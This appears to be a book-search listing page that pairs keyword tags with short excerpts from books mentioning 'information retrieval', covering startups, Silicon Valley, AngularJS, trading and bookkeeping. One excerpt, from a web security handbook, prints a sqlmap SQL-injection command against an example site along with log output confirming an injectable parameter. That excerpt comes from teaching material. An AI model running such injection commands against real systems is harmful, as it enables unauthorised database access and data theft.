"side hustle", Airbnb, always be closing, Amazon Web Services, autonomous vehicles, Ayatollah Khomeini, business process, Chuck Templeton: OpenTable:, cognitive dissonance, corporate governance, DARPA: Urban Challenge, Donald Trump, Elon Musk, gig economy, Golden Gate Park, Google X / Alphabet X, information retrieval, Jeff Bezos, Lyft, Marc Andreessen, Mark Zuckerberg, megacity, Menlo Park, new economy, pattern recognition, price mechanism, ride hailing / ride sharing, Sand Hill Road, self-driving car, Silicon Valley, Silicon Valley startup, Skype, Snapchat, South of Market, San Francisco, sovereign wealth fund, statistical model, Steve Jobs, TaskRabbit, Tony Hsieh, transportation-network company, Travis Kalanick, turn-by-turn navigation, Uber and Lyft, Uber for X, uber lyft, ubercab, young professional

It was what Camp later would refer to as a Web 1.0 experience. Still, the simplicity of the product masked the complexity of the software code necessary to build it. Camp was getting a master’s degree in software engineering, and though he and his friends bootstrapped StumbleUpon with their labor and little cash, their graduate research dovetailed with the product. Camp’s thesis was on “information retrieval through collaborative interface design and evolutionary algorithms.” Like Facebook, which began a few years later, StumbleUpon was a dorm-room success. It grew quickly to hundreds of thousands of users with Camp and his cofounders as the only employees. (Revenue would follow in later years with an early form of “native” advertising, full-page ads that would appear after several “stumbles,” or items users were discovering.)


pages: 222 words: 74,587

Paper Machines: About Cards & Catalogs, 1548-1929 by Markus Krajewski, Peter Krapp

business process, continuation of politics by other means, double entry bookkeeping, Frederick Winslow Taylor, Gödel, Escher, Bach, index card, Index librorum prohibitorum, information retrieval, invention of movable type, invention of the printing press, Jacques de Vaucanson, Johann Wolfgang von Goethe, Joseph-Marie Jacquard, knowledge worker, means of production, new economy, paper trading, Turing machine

Paper Machines History and Foundations of Information Science Edited by Michael Buckland, Jonathan Furner, and Markus Krajewski Human Information Retrieval by Julian Warner Good Faith Collaboration: The Culture of Wikipedia by Joseph Michael Reagle Jr. Paper Machines: About Cards & Catalogs, 1548–1929 by Markus Krajewski Paper Machines About Cards & Catalogs, 1548–1929 Markus Krajewski translated by Peter Krapp The MIT Press Cambridge, Massachusetts London, England © 2011 Massachusetts Institute of Technology © für die deutsche Ausgabe 2002, Kulturverlag Kadmos Berlin All rights reserved. No part of this book may be reproduced in any form by any electronic or mechanical means (including photocopying, recording, or information storage and retrieval) without permission in writing from the publisher.


pages: 245 words: 64,288

Robots Will Steal Your Job, But That's OK: How to Survive the Economic Collapse and Be Happy by Pistono, Federico

3D printing, Albert Einstein, autonomous vehicles, bioinformatics, Buckminster Fuller, cloud computing, computer vision, correlation does not imply causation, en.wikipedia.org, epigenetics, Erik Brynjolfsson, Firefox, future of work, George Santayana, global village, Google Chrome, happiness index / gross national happiness, hedonic treadmill, illegal immigration, income inequality, information retrieval, Internet of things, invention of the printing press, jimmy wales, job automation, John Markoff, Kevin Kelly, Khan Academy, Kickstarter, knowledge worker, labor-force participation, Lao Tzu, Law of Accelerating Returns, life extension, Loebner Prize, longitudinal study, means of production, Narrative Science, natural language processing, new economy, Occupy movement, patent troll, pattern recognition, peak oil, post scarcity, QR code, race to the bottom, Ray Kurzweil, recommendation engine, RFID, Rodney Brooks, selection bias, self-driving car, slashdot, smart cities, software as a service, software is eating the world, speech recognition, Steven Pinker, strong AI, technological singularity, Turing test, Vernor Vinge, women in the workforce

While our brains will stay pretty much the same for the next 20 years, computers’ efficiency and computational power will have doubled about twenty times. That is a million-fold increase. So, for the same $3 million you will have a computer a million times more powerful than Watson, or you could have a Watson-equivalent computer for $3. Watson’s computational power and exceptional skills in advanced Natural Language Processing, Information Retrieval, Knowledge Representation and Reasoning, Machine Learning, and open-domain question answering are already being put to better use than showing off at a TV contest. IBM and Nuance Communications Inc. are partnering on a research project to develop a commercial product during the next 18 to 24 months that will exploit Watson’s capabilities as a clinical decision support system to aid the diagnosis and treatment of patients.86 Recall the example of automated radiologists we mentioned earlier.


pages: 222 words: 70,132

Move Fast and Break Things: How Facebook, Google, and Amazon Cornered Culture and Undermined Democracy by Jonathan Taplin

1960s counterculture, affirmative action, Affordable Care Act / Obamacare, Airbnb, Amazon Mechanical Turk, American Legislative Exchange Council, Apple's 1984 Super Bowl advert, back-to-the-land, barriers to entry, basic income, battle of ideas, big data - Walmart - Pop Tarts, bitcoin, Brewster Kahle, Buckminster Fuller, Burning Man, Clayton Christensen, commoditize, creative destruction, crony capitalism, crowdsourcing, data is the new oil, David Brooks, David Graeber, don't be evil, Donald Trump, Douglas Engelbart, Douglas Engelbart, Dynabook, Edward Snowden, Elon Musk, equal pay for equal work, Erik Brynjolfsson, future of journalism, future of work, George Akerlof, George Gilder, Google bus, Hacker Ethic, Howard Rheingold, income inequality, informal economy, information asymmetry, information retrieval, Internet Archive, Internet of things, invisible hand, Jaron Lanier, Jeff Bezos, job automation, John Markoff, John Maynard Keynes: technological unemployment, John von Neumann, Joseph Schumpeter, Kevin Kelly, Kickstarter, labor-force participation, life extension, Marc Andreessen, Mark Zuckerberg, Menlo Park, Metcalfe’s law, Mother of all demos, move fast and break things, move fast and break things, natural language processing, Network effects, new economy, Norbert Wiener, offshore financial centre, packet switching, Paul Graham, paypal mafia, Peter Thiel, plutocrats, Plutocrats, pre–internet, Ray Kurzweil, recommendation engine, rent-seeking, revision control, Robert Bork, Robert Gordon, Robert Metcalfe, Ronald Reagan, Ross Ulbricht, Sam Altman, Sand Hill Road, secular stagnation, self-driving car, sharing economy, Silicon Valley, Silicon Valley ideology, smart grid, Snapchat, software is eating the world, Steve Jobs, Stewart Brand, technoutopianism, The Chicago School, The Market for Lemons, The Rise and Fall of American Growth, Tim Cook: Apple, trade route, transfer pricing, Travis Kalanick, trickle-down economics, Tyler Cowen: Great Stagnation, universal 
basic income, unpaid internship, We wanted flying cars, instead we got 140 characters, web application, Whole Earth Catalog, winner-take-all economy, women in the workforce, Y Combinator

When the show started it was as if Engelbart had arrived from the future, “dealing lightning with both hands.” The effect on the thousand people gathered for the conference was revolutionary. Imagine the first performance of Stravinsky’s The Rite of Spring but without the boos and walkouts. People were thunderstruck by this radical upending of what a computer could be. No longer a giant calculation machine, it was a personal tool of communication and information retrieval. 2. It is not an exaggeration to say that the work of Steve Jobs, Bill Gates, Larry Page, and Mark Zuckerberg stands on the shoulders of Doug Engelbart. Yet Engelbart’s vision of the computing future was different from today’s reality. In the run-up to the demonstration, Bill English had enlisted the help of Whole Earth Catalog publisher Stewart Brand, who had produced the Acid Tests with Ken Kesey two years earlier.


pages: 244 words: 66,599

Insanely Great: The Life and Times of Macintosh, the Computer That Changed Everything by Steven Levy

Apple II, Apple's 1984 Super Bowl advert, computer age, conceptual framework, Douglas Engelbart, Douglas Engelbart, Dynabook, Howard Rheingold, HyperCard, information retrieval, information trail, John Markoff, Kickstarter, knowledge worker, Marshall McLuhan, Mitch Kapor, Mother of all demos, Productivity paradox, QWERTY keyboard, rolodex, Silicon Valley, skunkworks, speech recognition, Steve Jobs, Steve Wozniak, Steven Levy, Ted Nelson, the medium is the message, Vannevar Bush

That was the intangible benefit of HyperCard: a hastening of what now seems an inevitable reordering of the way we consume information. On a more basic level, HyperCard found several niches, the most prevalent being an easy-to-use control panel, or "front end," for databases, providing easy access to files, pictures, notes, and video clips that otherwise would be elusive to those unschooled in the black arts of information retrieval. Thus it became associated with another use of the Macintosh that would become central to the computer's role in nudging digital technology a little closer to the familiar: multimedia. In recent years multimedia has taken on a negative connotation in the computer industry. The term is often used with a suspicious fuzziness and is often dismissed as a meaningless buzzword, tainted by hucksters invoking the word to move new hardware.


pages: 671 words: 228,348

Pro AngularJS by Adam Freeman

business process, create, read, update, delete, en.wikipedia.org, Google Chrome, information retrieval, inventory management, MVC pattern, place-making, premature optimization, revision control, Ruby on Rails, single page application, web application

For the URL, I specified productData.json. A URL like this will be requested relative to the main HTML document, which means that I don’t have to hard-code protocols, hostnames, and ports into the application. GET AND POST: PICK THE RIGHT ONE The rule of thumb is that GET requests should be used for all read-only information retrieval, while POST requests should be used for any operation that changes the application state. In standards-compliance terms, GET requests are for safe interactions (having no side effects besides information retrieval), and POST requests are for unsafe interactions (making a decision or changing something). These conventions are set by the World Wide Web Consortium (W3C) at www.w3.org/Protocols/rfc2616/rfc2616-sec9.html. GET requests are addressable—all the information is contained in the URL, so it’s possible to bookmark and link to these addresses.
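The safe/unsafe distinction can be sketched with Python's standard library (the URL is hypothetical; this illustrates the convention, not the book's AngularJS code):

```python
from urllib.parse import urlencode
from urllib.request import Request

# Safe interaction: read-only retrieval. All parameters live in the URL,
# so the request is addressable -- it can be bookmarked and linked to.
query = urlencode({"category": "widgets", "page": 2})
get_req = Request("http://example.com/products?" + query)  # defaults to GET

# Unsafe interaction: changes application state. The payload travels in
# the request body rather than in the URL.
post_req = Request(
    "http://example.com/products",
    data=urlencode({"name": "sprocket"}).encode(),
    method="POST",
)

print(get_req.get_method(), post_req.get_method())  # GET POST
```

Because the GET request carries everything in its URL, repeating it is harmless; the POST request, by convention, should never be replayed blindly.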


pages: 1,164 words: 309,327

Trading and Exchanges: Market Microstructure for Practitioners by Larry Harris

active measures, Andrei Shleifer, asset allocation, automated trading system, barriers to entry, Bernie Madoff, business cycle, buttonwood tree, buy and hold, compound rate of return, computerized trading, corporate governance, correlation coefficient, data acquisition, diversified portfolio, fault tolerance, financial innovation, financial intermediation, fixed income, floating exchange rates, High speed trading, index arbitrage, index fund, information asymmetry, information retrieval, interest rate swap, invention of the telegraph, job automation, law of one price, London Interbank Offered Rate, Long Term Capital Management, margin call, market bubble, market clearing, market design, market fragmentation, market friction, market microstructure, money market fund, Myron Scholes, Nick Leeson, open economy, passive investing, pattern recognition, Ponzi scheme, post-materialism, price discovery process, price discrimination, principal–agent problem, profit motive, race to the bottom, random walk, rent-seeking, risk tolerance, risk-adjusted returns, selection bias, shareholder value, short selling, Small Order Execution System, speech recognition, statistical arbitrage, statistical model, survivorship bias, the market place, transaction costs, two-sided market, winner-take-all economy, yield curve, zero-coupon bond, zero-sum game

The price will rise as others come to the same opinion, and it will surely rise when Exxon Mobil makes its announcement. In contrast, if the manager wants to buy the stock because he believes that it is fundamentally undervalued, Bob can be more patient. The prices of such stocks usually do not rise so quickly that Bob needs to hurry to trade. The portfolio manager says that he wants to buy Exxon Mobil because he believes it is fundamentally undervalued. Bob then uses an electronic information retrieval system to examine the recent price and trade history for Exxon Mobil. He looks to see whether other traders are trying to fill large orders. If a large seller is pushing prices down, Bob might be able to fill his order quickly at a good price. If Bob must compete with another large buyer, the order may be hard to execute at a good price. Falling prices often indicate that large buys will be easier to fill than large sells.

Most national regulatory agencies throughout the world have similar powers. In addition to their regulatory functions, the SEC and CFTC collect and disseminate information useful to traders, investors, speculators, and legislators. The SEC collects various financial reports from issuers and position reports from large traders. Investors who are interested in estimating security values can access these reports over the Internet via the SEC’s EDGAR information retrieval system. The CFTC likewise collects and publishes information about commodity market supply and demand conditions and large trader positions. Traders use this information to value commodities and to forecast what other traders might do in the future. Both organizations also provide information to Congress through their regular annual reports, their special reports on specific issues, their testimony at congressional hearings, and their responses to requests for information from members of Congress and their staffs.

Bill also starts posting notes to the Internet bulletin boards about the importance of the China information. His notes now project price targets of 20 and 25 dollars per share, with the possibility of more than 50 dollars a share by the time the new plant comes on line. 12.1.1 The Successful Ending: Bill Profits Some traders who follow BNB closely see the price change. They immediately query their electronic information retrieval services to determine why the stock is moving, and when it started to move. They find the story about producing in China and see that the price increase immediately followed its publication. Although the news has no particular fundamental value, many traders infer more from the story than they should because of the large positive price change that followed the announcement. They mistakenly conclude that other traders believe the story is extremely good news.


pages: 1,302 words: 289,469

The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws by Dafydd Stuttard, Marcus Pinto

call centre, cloud computing, commoditize, database schema, defense in depth, easy for humans, difficult for computers, Firefox, information retrieval, lateral thinking, MITM: man-in-the-middle, MVC pattern, optical character recognition, Ruby on Rails, Turing test, web application

Ensure that you configure your tools with this fact in mind. Application Pages Versus Functional Paths The enumeration techniques described so far have been implicitly driven by one particular picture of how web application content may be conceptualized and cataloged. This picture is inherited from the pre-application days of the World Wide Web, in which web servers functioned as repositories of static information, retrieved using URLs that were effectively filenames. To publish some web content, an author simply generated a bunch of HTML files and copied these into the relevant directory on a web server. When users followed hyperlinks, they navigated the set of files created by the author, requesting each file via its name within the directory tree residing on the server.

Many of these are specifically geared toward MS-SQL, and many have ceased active development and have been overtaken by new techniques and developments in SQL injection. The authors' favorite is sqlmap, which can attack MySQL, Oracle, and MS-SQL, among others. It implements UNION-based and inference-based retrieval. It supports various escalation methods, including retrieval of files from the operating system, and command execution under Windows using xp_cmdshell. In practice, sqlmap is an effective tool for database information retrieval through time-delay or other inference methods and can be useful for union-based retrieval. One of the best ways to use it is with the --sql-shell option. This gives the attacker a SQL prompt and performs the necessary union, error-based, or blind SQL injection behind the scenes to send and retrieve results. For example:

C:\sqlmap>sqlmap.py -u http://wahh-app.com/employees?Empno=7369 --union-use --sql-shell -p Empno

sqlmap/0.8 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:54:39

[14:54:39] [INFO] using 'C:\sqlmap\output\wahh-app.com\session' as session file
[14:54:39] [INFO] testing connection to the target url
[14:54:40] [WARNING] the testable parameter 'Empno' you provided is not into the Cookie
[14:54:40] [INFO] testing if the url is stable, wait a few seconds
[14:54:44] [INFO] url is stable
[14:54:44] [INFO] testing sql injection on GET parameter 'Empno' with 0 parenthesis
[14:54:44] [INFO] testing unescaped numeric injection on GET parameter 'Empno'
[14:54:46] [INFO] confirming unescaped numeric injection on GET parameter 'Empno'
[14:54:47] [INFO] GET parameter 'Empno' is unescaped numeric injectable with 0 parenthesis
[14:54:47] [INFO] testing for parenthesis on injectable parameter
[14:54:50] [INFO] the injectable parameter requires 0 parenthesis
[14:54:50] [INFO] testing MySQL
[14:54:51] [WARNING] the back-end DBMS is not MySQL
[14:54:51] [INFO] testing Oracle
[14:54:52] [INFO] confirming Oracle
[14:54:53] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2000
web application technology: ASP, Microsoft IIS 5.0
back-end DBMS: Oracle
[14:54:53] [INFO] testing inband sql injection on parameter 'Empno' with NULL bruteforcing technique
[14:54:58] [INFO] confirming full inband sql injection on parameter 'Empno'
[14:55:00] [INFO] the target url is affected by an exploitable full inband sql injection vulnerability
valid union: 'http://wahh-app.com:80/employees.asp?

/default/fedefault.aspx
SessionUser.Key f7e50aef8fadd30f31f3aeal04cef26ed2ce2be50073c
SessionClient.ID 306
SessionClient.ReviewID 245
UPriv.2100
SessionUser.NetworkLevelUser 0
UPriv.2200
SessionUser.BranchLevelUser 0
SessionDatabase fd219.prod.wahh-bank.com
The following items are commonly included in verbose debug messages: ■ Values of key session variables that can be manipulated via user input ■ Hostnames and credentials for back-end components such as databases ■ File and directory names on the server ■ Information embedded within meaningful session tokens (see Chapter 7) ■ Encryption keys used to protect data transmitted via the client (see Chapter 5) ■ Debug information for exceptions arising in native code components, including the values of CPU registers, contents of the stack, and a list of the loaded DLLs and their base addresses (see Chapter 16) When this kind of error reporting functionality is present in live production code, it may signify a critical weakness in the application's security. You should review it closely to identify any items that can be used to further advance your attack, and any ways in which you can supply crafted input to manipulate the application's state and control the information retrieved. Server and Database Messages Informative error messages are often returned not by the application itself but by some back-end component such as a database, mail server, or SOAP server. If a completely unhandled error occurs, the application typically responds with an HTTP 500 status code, and the response body may contain further information about the error. In other cases, the application may handle the error gracefully and return a customized message to the user, sometimes including error information generated by the back-end component.


pages: 242 words: 245

The New Ruthless Economy: Work & Power in the Digital Age by Simon Head

Asian financial crisis, business cycle, business process, call centre, conceptual framework, deskilling, Erik Brynjolfsson, Ford paid five dollars a day, Frederick Winslow Taylor, informal economy, information retrieval, medical malpractice, new economy, Panopticon Jeremy Bentham, shareholder value, Shoshana Zuboff, Silicon Valley, single-payer health, supply-chain management, telemarketer, Thomas Davenport, Toyota Production System, union organizing

Whalen and Vinkhuyzen were told that the company was reluctant to invest in training or support for customer service representatives that would increase their "knowledgeability." Instead, the company believed that "reducing dependency on people knowledge and skills through expert and artificial intelligence systems" offered the best approach. With the expert system containing "most, if not all, of the knowledge required to perform a task or solve a problem," the knowledgeability of the agent could be confined "largely to data entry and information retrieval procedures"—echoes of Hammer and Champy's deal structurers and case managers.29 The chief KM problem faced by MMR's software engineers was how to achieve an accurate definition of the problem to be solved by CasePoint. The one thing the expert system could not do was provide for itself an accurate description of the symptoms of machine breakdown. But without such an accurate description to work with, CasePoint could not embark upon its "case reasoning" to come up with the correct solution to the problem.


pages: 242 words: 71,938

The Google Resume: How to Prepare for a Career and Land a Job at Apple, Microsoft, Google, or Any Top Tech Company by Gayle Laakmann Mcdowell

barriers to entry, cloud computing, game design, information retrieval, job-hopping, side project, Silicon Valley, Steve Jobs, why are manhole covers round?

They provide just the right amount of detail to be useful, without overwhelming the reader. 10. The one thing that would make this slightly stronger is for Bill to list the dates of the projects. Distributed Hash Table (Language/Platform: Java/Linux) Successfully implemented a Distributed Hash Table based on the Chord lookup protocol. The Chord protocol is one solution for connecting the peers of a P2P network; Chord consistently maps a key onto a node. Information Retrieval System (Language/Platform: Java/Linux) Developed an indexer to index a corpus of files and a Query Processor to process Boolean queries. The Query Processor outputs the file name, title, line number, and word position. Implemented using Java APIs such as serialization and collections (SortedSet, HashMap). Achievements Won Star Associate Award at Capgemini for outstanding performance. Received client appreciation for increasing productivity by developing a Batch Stat Automation tool. 11.


pages: 238 words: 77,730

Final Jeopardy: Man vs. Machine and the Quest to Know Everything by Stephen Baker

23andMe, AI winter, Albert Einstein, artificial general intelligence, business process, call centre, clean water, commoditize, computer age, Frank Gehry, information retrieval, Iridium satellite, Isaac Newton, job automation, pattern recognition, Ray Kurzweil, Silicon Valley, Silicon Valley startup, statistical model, theory of mind, thinkpad, Turing test, Vernor Vinge, Wall-E, Watson beat the top human players on Jeopardy!

And the brain appears to busy itself with this internal dispute instead of systematically trawling for the most promising clues and pathways. Researchers at Harvard, studying the brain scans of people suffering from tip of the tongue syndrome, have noted increased activity in the anterior cingulate—a part of the brain behind the frontal lobe, devoted to conflict resolution and detecting surprise. Few of these conflicts appeared to interfere with Jennings’s information retrieval. During his unprecedented seventy-four-game streak, he routinely won the buzz on more than half the clues. And his snap judgments that the answers were on call in his head somewhere led him to a remarkable 92 percent precision rate, according to statistics compiled by the quiz show’s fans. This topped the average champion by 10 percent. As IBM’s scientists contemplated building a machine that could compete with the likes of Ken Jennings, they understood their constraints.


pages: 345 words: 75,660

Prediction Machines: The Simple Economics of Artificial Intelligence by Ajay Agrawal, Joshua Gans, Avi Goldfarb

"Robert Solow", Ada Lovelace, AI winter, Air France Flight 447, Airbus A320, artificial general intelligence, autonomous vehicles, basic income, Bayesian statistics, Black Swan, blockchain, call centre, Capital in the Twenty-First Century by Thomas Piketty, Captain Sullenberger Hudson, collateralized debt obligation, computer age, creative destruction, Daniel Kahneman / Amos Tversky, data acquisition, data is the new oil, deskilling, disruptive innovation, Elon Musk, en.wikipedia.org, Erik Brynjolfsson, everywhere but in the productivity statistics, Google Glasses, high net worth, ImageNet competition, income inequality, information retrieval, inventory management, invisible hand, job automation, John Markoff, Joseph Schumpeter, Kevin Kelly, Lyft, Minecraft, Mitch Kapor, Moneyball by Michael Lewis explains big data, Nate Silver, new economy, On the Economy of Machinery and Manufactures, pattern recognition, performance metric, profit maximization, QWERTY keyboard, race to the bottom, randomized controlled trial, Ray Kurzweil, ride hailing / ride sharing, Second Machine Age, self-driving car, shareholder value, Silicon Valley, statistical model, Stephen Hawking, Steve Jobs, Steven Levy, strong AI, The Future of Employment, The Signal and the Noise by Nate Silver, Tim Cook: Apple, Turing test, Uber and Lyft, uber lyft, US Airways Flight 1549, Vernor Vinge, Watson beat the top human players on Jeopardy!, William Langewiesche, Y Combinator, zero-sum game

To be mobile-first is to drive traffic to your mobile experience and optimize consumers’ interfaces for mobile even at the expense of your full website and other platforms. The last part is what makes it strategic. “Do well on mobile” is something to aim for. But saying you will do so even if it harms other channels is a real commitment. What does this mean in the context of AI-first? Google’s research director Peter Norvig gives an answer: With information retrieval, anything over 80% recall and precision is pretty good—not every suggestion has to be perfect, since the user can ignore the bad suggestions. With assistance, there is a much higher barrier. You wouldn’t use a service that booked the wrong reservation 20% of the time, or even 2% of the time. So an assistant needs to be much more accurate, and thus more intelligent, more aware of the situation.
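The 80% figure in Norvig's quote refers to the two standard retrieval metrics, which are simple ratios; a toy computation with invented sets (not drawn from the book):

```python
def precision_recall(retrieved, relevant):
    """Precision: fraction of retrieved items that are relevant.
    Recall: fraction of relevant items that were retrieved."""
    retrieved, relevant = set(retrieved), set(relevant)
    hits = len(retrieved & relevant)
    return hits / len(retrieved), hits / len(relevant)

# Hypothetical example: 4 of 5 suggestions are relevant, and 4 of the
# 5 truly relevant items were found -- Norvig's "pretty good" regime.
p, r = precision_recall([1, 2, 3, 4, 5], [2, 3, 4, 5, 6])
print(p, r)  # 0.8 0.8
```

The asymmetry Norvig describes is that a search user filters bad suggestions for free, while an assistant that acts on a wrong answer incurs the full cost of the error, so the same 80% score means very different things in the two settings.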


Mastering Structured Data on the Semantic Web: From HTML5 Microdata to Linked Open Data by Leslie Sikos

AGPL, Amazon Web Services, bioinformatics, business process, cloud computing, create, read, update, delete, Debian, en.wikipedia.org, fault tolerance, Firefox, Google Chrome, Google Earth, information retrieval, Infrastructure as a Service, Internet of things, linked data, natural language processing, openstreetmap, optical character recognition, platform as a service, search engine result page, semantic web, Silicon Valley, social graph, software as a service, SPARQL, text mining, Watson beat the top human players on Jeopardy!, web application, wikimedia commons

Oracle (2015) Oracle Spatial and Graph. www.oracle.com/technetwork/database/options/spatialandgraph/overview/index.html. Accessed 10 April 2015. 11. SYSTAP LLC (2015) Blazegraph. www.blazegraph.com/bigdata. Accessed 10 April 2015. Chapter 7 Querying While machine-readable datasets are published primarily for software agents, automatic data extraction is not always an option. Semantic Information Retrieval often involves users searching for the answer to a complex question, based on the formally represented knowledge in a dataset or database. While Structured Query Language (SQL) is used to query relational databases, querying graph databases and flat Resource Description Framework (RDF) files can be done using the SPARQL Protocol and RDF Query Language (SPARQL), the primary query language of RDF, which is much more powerful than SQL.
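A small SPARQL query of the kind the chapter describes, shown purely as an illustration (the FOAF vocabulary is standard, but the dataset queried here is hypothetical):

```sparql
PREFIX foaf: <http://xmlns.com/foaf/0.1/>

SELECT ?name ?email
WHERE {
  ?person a foaf:Person ;
          foaf:name ?name ;
          foaf:mbox ?email .
}
ORDER BY ?name
LIMIT 10
```

Unlike a SQL SELECT, which matches rows against a fixed table schema, the WHERE clause here matches triple patterns against a graph, so the same query runs unchanged over any RDF dataset that uses the FOAF vocabulary.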


Deep Work: Rules for Focused Success in a Distracted World by Cal Newport

8-hour work day, Albert Einstein, barriers to entry, business climate, Cal Newport, Capital in the Twenty-First Century by Thomas Piketty, Clayton Christensen, David Brooks, David Heinemeier Hansson, deliberate practice, disruptive innovation, Donald Knuth, Donald Trump, Downton Abbey, en.wikipedia.org, Erik Brynjolfsson, experimental subject, follow your passion, Frank Gehry, informal economy, information retrieval, Internet Archive, Jaron Lanier, knowledge worker, Mark Zuckerberg, Marshall McLuhan, Merlin Mann, Nate Silver, new economy, Nicholas Carr, popular electronics, remote working, Richard Feynman, Ruby on Rails, Silicon Valley, Silicon Valley startup, Snapchat, statistical model, the medium is the message, Watson beat the top human players on Jeopardy!, web application, winner-take-all economy, zero-sum game

If you find yourself glued to a smartphone or laptop throughout your evenings and weekends, then it’s likely that your behavior outside of work is undoing many of your attempts during the workday to rewire your brain (which makes little distinction between the two settings). In this case, I would suggest that you maintain the strategy of scheduling Internet use even after the workday is over. To simplify matters, when scheduling Internet use after work, you can allow time-sensitive communication into your offline blocks (e.g., texting with a friend to agree on where you’ll meet for dinner), as well as time-sensitive information retrieval (e.g., looking up the location of the restaurant on your phone). Outside of these pragmatic exceptions, however, when in an offline block, put your phone away, ignore texts, and refrain from Internet usage. As in the workplace variation of this strategy, if the Internet plays a large and important role in your evening entertainment, that’s fine: Schedule lots of long Internet blocks. The key here isn’t to avoid or even to reduce the total amount of time you spend engaging in distracting behavior, but is instead to give yourself plenty of opportunities throughout your evening to resist switching to these distractions at the slightest hint of boredom.


Mastering Book-Keeping: A Complete Guide to the Principles and Practice of Business Accounting by Peter Marshall

accounting loophole / creative accounting, asset allocation, double entry bookkeeping, information retrieval, intangible asset, the market place

Tel: (01865) 375794. Fax: (01865) 379162. info@howtobooks.co.uk www.howtobooks.co.uk © 2009 Dr Peter Marshall First edition 1992 Second edition 1995 Third edition 1997 Fourth edition 1999 Fifth edition 2001 Sixth edition 2003 Seventh edition 2005 Reprinted 2006 Eighth edition 2009 First published in electronic form 2009 All rights reserved. No part of this work may be reproduced or stored in an information retrieval system (other than for purposes of review) without the express permission of the publisher in writing. The rights of Peter Marshall to be identified as the author of this work have been asserted by him in accordance with the Copyright Designs and Patents Act 1988. British Library Cataloguing in Publication Data A catalogue record for this book is available from the British Library ISBN 978 1 84803 324 5 Produced for How To Books by Deer Park Productions, Tavistock, Devon Typeset by PDQ Typesetting, Newcastle-under-Lyme, Staffordshire Cover design by Baseline Arts Ltd, Oxford NOTE: The material contained in this book is set out in good faith for general guidance and no liability can be accepted for loss or expense incurred as a result of relying in particular circumstances on statements made in the book.


pages: 411 words: 80,925

What's Mine Is Yours: How Collaborative Consumption Is Changing the Way We Live by Rachel Botsman, Roo Rogers

Airbnb, barriers to entry, Bernie Madoff, bike sharing scheme, Buckminster Fuller, buy and hold, carbon footprint, Cass Sunstein, collaborative consumption, collaborative economy, commoditize, Community Supported Agriculture, credit crunch, crowdsourcing, dematerialisation, disintermediation, en.wikipedia.org, experimental economics, George Akerlof, global village, hedonic treadmill, Hugh Fearnley-Whittingstall, information retrieval, iterative process, Kevin Kelly, Kickstarter, late fees, Mark Zuckerberg, market design, Menlo Park, Network effects, new economy, new new economy, out of africa, Parkinson's law, peer-to-peer, peer-to-peer lending, peer-to-peer rental, Ponzi scheme, pre–internet, recommendation engine, RFID, Richard Stallman, ride hailing / ride sharing, Robert Shiller, Robert Shiller, Ronald Coase, Search for Extraterrestrial Intelligence, SETI@home, Simon Kuznets, Skype, slashdot, smart grid, South of Market, San Francisco, Stewart Brand, The Nature of the Firm, The Spirit Level, The Wealth of Nations by Adam Smith, The Wisdom of Crowds, Thorstein Veblen, Torches of Freedom, transaction costs, traveling salesman, ultimatum game, Victor Gruen, web of trust, women in the workforce, Zipcar

This section was heavily influenced by Richard Grant’s “Drowning in Plastic: The Great Pacific Garbage Patch Is Twice the Size of France,” Telegraph (April 24, 2009), www.telegraph.co.uk/earth/environment/5208645/Drowning-in-plastic-The-Great-Pacific-Garbage-Patch-is-twice-the-size-of-France.html. 5. Statistics on annual consumption of plastic materials come from “Plastics Recycling Information.” Retrieved August 2009, www.wasteonline.org.uk/resources/InformationSheets/Plastics.htm. 6. Thomas M. Kostigen, “The World’s Largest Dump: The Great Pacific Garbage Patch,” Discover Magazine (July 10, 2008), http://discovermagazine.com/2008/jul/10-the-worlds-largest-dump. 7. Paul Hawken, Amory Lovins, and L. Hunter Lovins, Natural Capitalism (Rocky Mountain Institute, 1999), 4, www.natcap.org/sitepages/pid5.php. 8.


Writing Effective Use Cases by Alistair Cockburn

business process, c2.com, create, read, update, delete, finite state, index card, information retrieval, iterative process, recommendation engine, Silicon Valley, web application

The shopper passes a point that the web site owner has predetermined to generate sales leads (dynamic business rule): System generates sales lead. 2e. System has been set up to require the Shopper to identify themselves: Shopper establishes identity 2f. System is set up to interact with known other systems (parts inventory, process & planning) that will affect product availability and selection: 2f.1. System interacts with known other systems (parts inventory, process & planning) to get the needed information. (Retrieve Part Availability, Retrieve Build Schedule). 2f.2. System uses the results to filter or show availability of product and/or options (parts). 2g. Shopper was presented and selects a link to an Industry related web-site: Shopper views other web-site. 2h. System is set up to interact with known Customer Information System: 2h.1. System retrieves customer information from Customer Information System 2h.2.


pages: 791 words: 85,159

Social Life of Information by John Seely Brown, Paul Duguid

business process, Claude Shannon: information theory, computer age, cross-subsidies, disintermediation, double entry bookkeeping, Frank Gehry, frictionless, frictionless market, future of work, George Gilder, George Santayana, global village, Howard Rheingold, informal economy, information retrieval, invisible hand, Isaac Newton, John Markoff, Just-in-time delivery, Kenneth Arrow, Kevin Kelly, knowledge economy, knowledge worker, lateral thinking, loose coupling, Marshall McLuhan, medical malpractice, moral hazard, Network effects, new economy, Productivity paradox, Robert Metcalfe, rolodex, Ronald Coase, shareholder value, Shoshana Zuboff, Silicon Valley, Steve Jobs, Superbowl ad, Ted Nelson, telepresence, the medium is the message, The Nature of the Firm, The Wealth of Nations by Adam Smith, Thomas Malthus, transaction costs, Turing test, Vannevar Bush, Y2K

The difficulty of this central challenge, however, has been obscured by the redefinition that, as we noted earlier, infoenthusiasts tend to indulge. The definitions of knowledge management that began this chapter perform a familiar two-step. First, they define the core problem in terms of information, so that, second, they can put solutions in the province of information technology.13 Here, retrieval looks as easy as search. Page 125 If information retrieval were all that is required for such things as knowledge management or best practice, HP would have nothing to worry about. It has an abundance of very good information technology. The persistence of HP's problem, then, argues that knowledge management, knowledge, and learning involve more than information. In the rest of this chapter we try to understand what else is involved, looking primarily at knowledge and learning on the assumption that these need to be understood before knowledge management can be considered.


pages: 290 words: 83,248

The Greed Merchants: How the Investment Banks Exploited the System by Philip Augar

